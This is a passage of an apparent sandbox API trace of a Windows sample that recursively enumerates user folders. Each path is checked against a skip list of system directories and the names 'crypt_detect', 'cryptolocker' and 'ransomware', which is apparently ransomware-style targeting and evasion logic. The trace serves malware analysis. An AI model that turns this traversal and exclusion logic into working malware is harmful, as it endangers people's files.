lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0072.116] FindClose (in: hFindFile=0xec25b0 | out: hFindFile=0xec25b0) returned 1 [0072.116] GetProcessHeap () returned 0xe30000 [0072.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf520 | out: hHeap=0xe30000) returned 1 [0072.116] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0072.116] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0072.116] GetProcessHeap () returned 0xe30000 [0072.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xece048 | out: hHeap=0xe30000) returned 1 [0072.116] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4204fb0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5636bd87, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0072.116] StrCmpW (psz1="Documents", psz2=".") returned 1 [0072.116] StrCmpW (psz1="Documents", psz2="..") returned 1 [0072.116] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Default.migrated", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated") returned="C:\\Users\\Default.migrated" [0072.116] StrNCatW (in: psz1="C:\\Users\\Default.migrated", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\") returned="C:\\Users\\Default.migrated\\" [0072.116] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\", psz2="Documents", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\Documents") returned="C:\\Users\\Default.migrated\\Documents" [0072.116] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\windows\\system32\\") returned 0x0 [0072.116] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.116] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\windows\\system\\") returned 0x0 [0072.116] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.116] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.116] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\appdata\\local\\") returned 0x0 [0072.116] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.116] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.116] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.117] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\boot\\") returned 0x0 [0072.117] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\perflogs\\") returned 0x0 [0072.117] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\programdata\\") returned 0x0 [0072.117] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\drivers\\") returned 0x0 [0072.117] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\wsus\\") returned 0x0 [0072.117] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.117] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.117] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="crypt_detect") returned 0x0 [0072.117] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="cryptolocker") returned 0x0 [0072.117] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="ransomware") returned 0x0 [0072.117] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="C:\\WINDOWS") returned 0x0 [0072.117] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.117] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="C:\\Program Files") returned 0x0 [0072.117] GetProcessHeap () returned 0xe30000 [0072.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c8) returned 0xece048 [0072.117] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\Default.migrated\\Documents", cchMax=1096 | out: psz1="C:\\Users\\Default.migrated\\Documents") returned="C:\\Users\\Default.migrated\\Documents" [0072.117] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\Documents", psz2="\\*", cchMax=1096 | out: psz1="C:\\Users\\Default.migrated\\Documents\\*") returned="C:\\Users\\Default.migrated\\Documents\\*" [0072.117] FindFirstFileW (in: lpFileName="C:\\Users\\Default.migrated\\Documents\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4204fb0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5636bd87, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0072.119] StrCmpW (psz1=".", psz2=".") returned 0 [0072.119] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4204fb0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5636bd87, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.119] StrCmpW (psz1="..", psz2=".") returned 1 [0072.120] StrCmpW (psz1="..", psz2="..") returned 0 [0072.120] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99a3d0f, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99a3d0f, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99a3d0f, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0072.120] StrCmpW (psz1="My Music", psz2=".") returned 1 [0072.120] StrCmpW (psz1="My Music", psz2="..") returned 1 [0072.120] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99c9f63, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99c9f63, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99c9f63, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0072.120] StrCmpW (psz1="My Pictures", psz2=".") returned 1 [0072.120] StrCmpW (psz1="My Pictures", psz2="..") returned 1 [0072.120] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99c9f63, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99c9f63, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99c9f63, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0072.120] StrCmpW (psz1="My Videos", psz2=".") returned 1 [0072.120] StrCmpW (psz1="My Videos", psz2="..") returned 1 [0072.120] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99c9f63, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99c9f63, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99c9f63, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0072.120] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0072.121] GetProcessHeap () returned 0xe30000 [0072.121] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xece048 | out: hHeap=0xe30000) returned 1 [0072.121] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4204fb0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5636bd87, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0 [0072.121] FindClose (in: hFindFile=0xec2730 | out: hFindFile=0xec2730) returned 1 [0072.121] GetProcessHeap () returned 0xe30000 [0072.121] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7e68 | out: hHeap=0xe30000) returned 1 [0072.121] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1a9bc987, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5f69dfa, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5f69dfa, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0072.121] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0072.121] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0072.121] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 1 [0072.121] StrCmpW (psz1="FD1HVy", psz2=".") returned 1 [0072.121] StrCmpW (psz1="FD1HVy", psz2="..") returned 1 [0072.121] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0072.121] StrNCatW (in: psz1="C:\\Users", psz2="\\", cchMax=1042 | out: psz1="C:\\Users\\") returned="C:\\Users\\" [0072.121] StrNCatW (in: psz1="C:\\Users\\", psz2="FD1HVy", cchMax=1042 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0072.121] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\windows\\system32\\") returned 0x0 [0072.121] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.121] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\windows\\system\\") returned 0x0 [0072.121] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.121] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.121] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\appdata\\local\\") returned 0x0 [0072.121] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.121] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.121] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.121] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\boot\\") returned 0x0 [0072.121] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\perflogs\\") returned 0x0 [0072.121] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\programdata\\") returned 0x0 [0072.121] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\drivers\\") returned 0x0 [0072.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\wsus\\") returned 0x0 [0072.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="crypt_detect") returned 0x0 [0072.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="cryptolocker") returned 0x0 [0072.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="ransomware") returned 0x0 [0072.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="C:\\WINDOWS") returned 0x0 [0072.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="C:\\Program Files") returned 0x0 [0072.122] GetProcessHeap () returned 0xe30000 [0072.122] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4a0) returned 0xec7e68 [0072.122] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0072.122] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\*", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\*") returned="C:\\Users\\FD1HVy\\*" [0072.122] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec25b0 [0072.122] StrCmpW (psz1=".", psz2=".") returned 0 [0072.122] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.122] StrCmpW (psz1="..", psz2=".") returned 1 [0072.122] StrCmpW (psz1="..", psz2="..") returned 0 [0072.122] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0072.122] StrCmpW (psz1="AppData", psz2=".") returned 1 [0072.122] StrCmpW (psz1="AppData", psz2="..") returned 1 [0072.122] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0072.122] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0072.122] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="AppData", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\windows\\system32\\") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\windows\\system\\") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\appdata\\local\\") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\boot\\") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\perflogs\\") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\programdata\\") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\drivers\\") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\wsus\\") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="crypt_detect") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="cryptolocker") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="ransomware") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="C:\\WINDOWS") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="C:\\Program Files") returned 0x0 [0072.123] GetProcessHeap () returned 0xe30000 [0072.123] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b0) returned 0xece048 [0072.123] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\FD1HVy\\AppData", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0072.123] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData", psz2="\\*", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\*") returned="C:\\Users\\FD1HVy\\AppData\\*" [0072.123] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2330 [0072.123] StrCmpW (psz1=".", psz2=".") returned 0 [0072.123] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.123] StrCmpW (psz1="..", psz2=".") returned 1 [0072.124] StrCmpW (psz1="..", psz2="..") returned 0 [0072.124] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0072.124] StrCmpW (psz1="Local", psz2=".") returned 1 [0072.124] StrCmpW (psz1="Local", psz2="..") returned 1 [0072.124] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\FD1HVy\\AppData", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0072.124] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\" [0072.124] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\", psz2="Local", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\windows\\system32\\") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\windows\\system\\") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\appdata\\local\\") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\boot\\") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\perflogs\\") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\programdata\\") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\drivers\\") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\wsus\\") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="crypt_detect") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="cryptolocker") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="ransomware") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="C:\\WINDOWS") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.124] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="C:\\Program Files") returned 0x0 [0072.124] GetProcessHeap () returned 0xe30000 [0072.124] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4bc) returned 0xecf508 [0072.124] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.125] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\*", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\*") returned="C:\\Users\\FD1HVy\\AppData\\Local\\*" [0072.125] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, 